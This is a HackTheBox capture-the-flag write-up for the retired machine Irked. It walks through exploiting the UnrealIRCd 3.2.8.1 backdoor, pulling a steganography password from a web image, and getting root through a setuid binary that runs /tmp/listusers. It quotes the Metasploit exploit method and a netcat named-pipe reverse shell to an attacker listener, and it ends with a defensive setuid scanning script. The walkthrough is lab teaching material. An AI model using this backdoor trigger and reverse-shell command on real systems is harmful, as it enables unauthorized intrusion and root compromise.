HackTheBox - Irked



OS      Difficulty   IP Address      Status
Linux   Easy         10.10.10.117    Retired

Irked is a machine by MrAgent that HackTheBox rates Easy. It runs a web server that serves only an image, and an Internet Relay Chat (IRC) daemon, UnrealIRCd, whose 3.2.8.1 release shipped with a backdoor that gives remote command execution; we will analyze and trigger it to gain a foothold on the box. A password hidden in the web page’s image with steganography then gets us the user account, and for privilege escalation we will find a setuid-root binary that executes a file under /tmp, which we replace with our own script to get root.

Phase 1 - Enumeration

Nmap

As usual, we start off with an nmap scan of the default ports to identify open services.

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36095/tcp6  status
|   100024  1          40049/udp6  status
|   100024  1          44079/udp   status
|_  100024  1          53133/tcp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

That does not leave much to enumerate, so let’s run a full port scan, too.

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http       Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind    rpcbind 2-4 (RPC #100000)
6697/tcp  open  ircs-u     UnrealIRCd
8067/tcp  open  infi-async UnrealIRCd
65534/tcp open  irc        UnrealIRCd

The full scan adds three ports all served by UnrealIRCd: 6697 (the conventional TLS IRC port), 8067 and 65534. Nmap recognised the daemon but not its version.

Port 80

When we browse to the webpage, we only find an image.

The page source holds nothing else but a note reading “IRC is almost working”.

Phase 2 - Exploitation

UnrealIRCd (RCE)

Nmap identified the IRC application as UnrealIRCd. Looking it up with ExploitDB’s command-line tool searchsploit, we find a backdoor command-execution exploit for UnrealIRCd 3.2.8.1 (nmap did not report a version, so we will simply try it):

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ searchsploit UnrealIRC

UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)   | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow        | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                 | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                      | windows/dos/27407.pl

Since we are doing things manually, we will skip running the Metasploit module and just read its exploit method to understand how the backdoor is triggered.

def exploit
  connect

  print_status("Connected to #{rhost}:#{rport}...")
  # Read the daemon's initial NOTICE AUTH lines so the trigger is only
  # sent once the server is parsing input.
  banner = sock.get_once(-1, 30)
  banner.to_s.split("\n").each do |line|
    print_line("    #{line}")
  end

  print_status("Sending backdoor command...")
  # The whole exploit: a line beginning with "AB;" makes the trojaned daemon
  # pass everything after those three bytes to system().
  sock.put("AB;" + payload.encoded + "\n")

  handler
  disconnect
end

So the exploit amounts to connecting to the daemon, waiting for the banner, and sending a line that starts with “AB;” followed by a shell command. This is not a parsing bug but a backdoor (CVE-2010-2075): the 3.2.8.1 source tarball offered on the project’s mirrors from November 2009 until June 2010 had been replaced with a trojaned copy containing an added check that hands everything after “AB;” on an incoming line to system(), so the command runs as whatever user the daemon runs as. The module does no version check; if the daemon is clean, the line is simply treated as an unknown IRC command and nothing else happens.

Shell

We connect to the IRC daemon with netcat, wait for the NOTICE AUTH banner, and then send the “AB;” trigger followed by a named-pipe reverse shell pointed at our listener on 10.10.14.7:443:

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ nc 10.10.10.117 6697
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 443 >/tmp/f
:irked.htb 451 AB; :You have not registered

And we get a shell as ircd, the unprivileged user the daemon runs as:

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ nc -lnvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.117.
Ncat: Connection from 10.10.10.117:40718.
bash: cannot set terminal process group (634): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

From ircd to djmardov

Inside djmardov’s home directory we can find user.txt, but as ircd we can’t read it:

ircd@irked:/home/djmardov/Documents$ cat user.txt 
cat: user.txt: Permission denied

In that same directory, there’s a hidden .backup file:

ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

The note says “steg backup pw”, so the password is for something hidden with steganography.

Steganography

Steganography is the practice of hiding a message inside an innocuous carrier, such as an image, so that it sits in plain sight. When we opened the webpage on port 80 there was nothing but an image, and steghide, the most common tool for this, works on JPEG, BMP, WAV and AU files. Let’s download the image and try to extract from it with the password we found:

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ wget 10.10.10.117/irked.jpg
--2019-04-04 08:56:51--  http://10.10.10.117/irked.jpg
Connecting to 10.10.10.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’

irked.jpg                   100%[========================================>]  33.88K   137KB/s    in 0.2s

2019-04-04 08:56:52 (137 KB/s) - ‘irked.jpg’ saved [34697/34697]


┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ cat pass.txt
Kab6h+m+bbp2J:HG

The extracted file holds a password. The backup note was in djmardov’s home directory, so let’s try it over SSH as that user:

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr  4 07:11:52 2019 from 10.10.14.7
djmardov@irked:~$

We get in as djmardov and can now read user.txt.

Phase 3 - Privilege Escalation

SUID Path

When we run a find command to look for setuid binaries, one that is not part of any standard Debian package sticks out:

djmardov@irked:~$ find / -perm -4000 -type f -exec ls -l {} \; 2>/dev/null

...[snip]...
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser

Running the binary prints a banner, who-style output of logged-in users, and then an error from sh about a file that is not found:

djmardov@irked:/dev/shm$ viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-04-03 06:34 (:0)
djmardov pts/2        2019-04-04 09:01 (10.10.14.14)
sh: 1: /tmp/listusers: not found

The “sh: 1:” prefix tells us viewuser shells out through /bin/sh -c (system() or similar), and the thing it tries to run is an absolute path under /tmp, a world-writable directory. Since the binary is setuid root, whatever we place at /tmp/listusers is executed with root privileges. So let’s create the file, have it just run sh, and make it executable:

djmardov@irked:~$ echo sh > /tmp/listusers 
djmardov@irked:~$ chmod +x /tmp/listusers 
djmardov@irked:~$ viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2018-11-20 11:57 (:0)
djmardov pts/0        2018-11-20 11:58 (10.10.14.7)
djmardov pts/1        2018-11-20 12:36 (10.10.14.7)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)

And we are root! Note that id shows uid=0 but gid=1000(djmardov): the binary set its real uid to root before running /tmp/listusers and never touched the group, which is why the shell keeps djmardov’s groups. That also explains why a plain sh was enough here. On Debian /bin/sh is dash, which never drops privileges on its own, and since the real uid was changed even bash would not have dropped them; had the program only relied on the effective uid, a script starting bash would have needed bash -p.
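As a defensive check, here is an added example, not from the original write-up: a Python triage script that does in bulk what we did by hand above. It walks the filesystem for setuid-root files and pulls strings(1)-style printable runs out of each, flagging any absolute path under a world-writable directory. The SAMPLE_BINARY bytes are a constructed stand-in for viewuser (ELF magic plus strings the run above reveals); the function names and the prefix list are my own assumptions.

```python
import os
import re
import stat

# Directories any local user can write to; an absolute path under one of these
# inside a setuid-root binary is the /tmp/listusers pattern.
WORLD_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
PATH_RE = re.compile(rb"/(?:[A-Za-z0-9._-]+/)*[A-Za-z0-9._-]+")


def printable_strings(data: bytes, min_len: int = 4):
    """Roughly what strings(1) does: runs of printable ASCII of at least min_len."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def risky_paths(data: bytes):
    """Absolute paths embedded in the binary that live under a world-writable
    directory, sorted and de-duplicated."""
    found = set()
    for s in printable_strings(data):
        for p in PATH_RE.findall(s):
            path = p.decode()
            if path.startswith(WORLD_WRITABLE_PREFIXES):
                found.add(path)
    return sorted(found)


def is_setuid_root(path: str) -> bool:
    """True for a file owned by uid 0 with the setuid bit set."""
    st = os.stat(path)
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0


def scan_setuid_binaries(root="/"):
    """Walk the filesystem like 'find / -perm -4000' and report setuid-root
    files referencing world-writable paths. Unreadable entries are skipped,
    as the 2>/dev/null in the write-up's find command does."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                if os.path.islink(full) or not os.path.isfile(full):
                    continue
                if not is_setuid_root(full):
                    continue
                with open(full, "rb") as f:
                    paths = risky_paths(f.read())
            except OSError:
                continue
            if paths:
                hits[full] = paths
    return hits


# Constructed stand-in for the viewuser binary: ELF magic, padding, the banner
# string from the run above, the path it shells out to, and one harmless path.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 41
    + b"This application is being devleoped to set and test user permissions\x00"
    + b"/tmp/listusers\x00"
    + b"/usr/bin/who\x00"
)


if __name__ == "__main__":
    print("sample binary:", risky_paths(SAMPLE_BINARY))
    for binary, paths in scan_setuid_binaries("/").items():
        print(binary, "->", ", ".join(paths))
```

The string scan is a heuristic: a binary can build the path at runtime or read it from a config file, so a clean report is not proof of safety, but a hit like /tmp/listusers in a setuid-root file is worth a look every time.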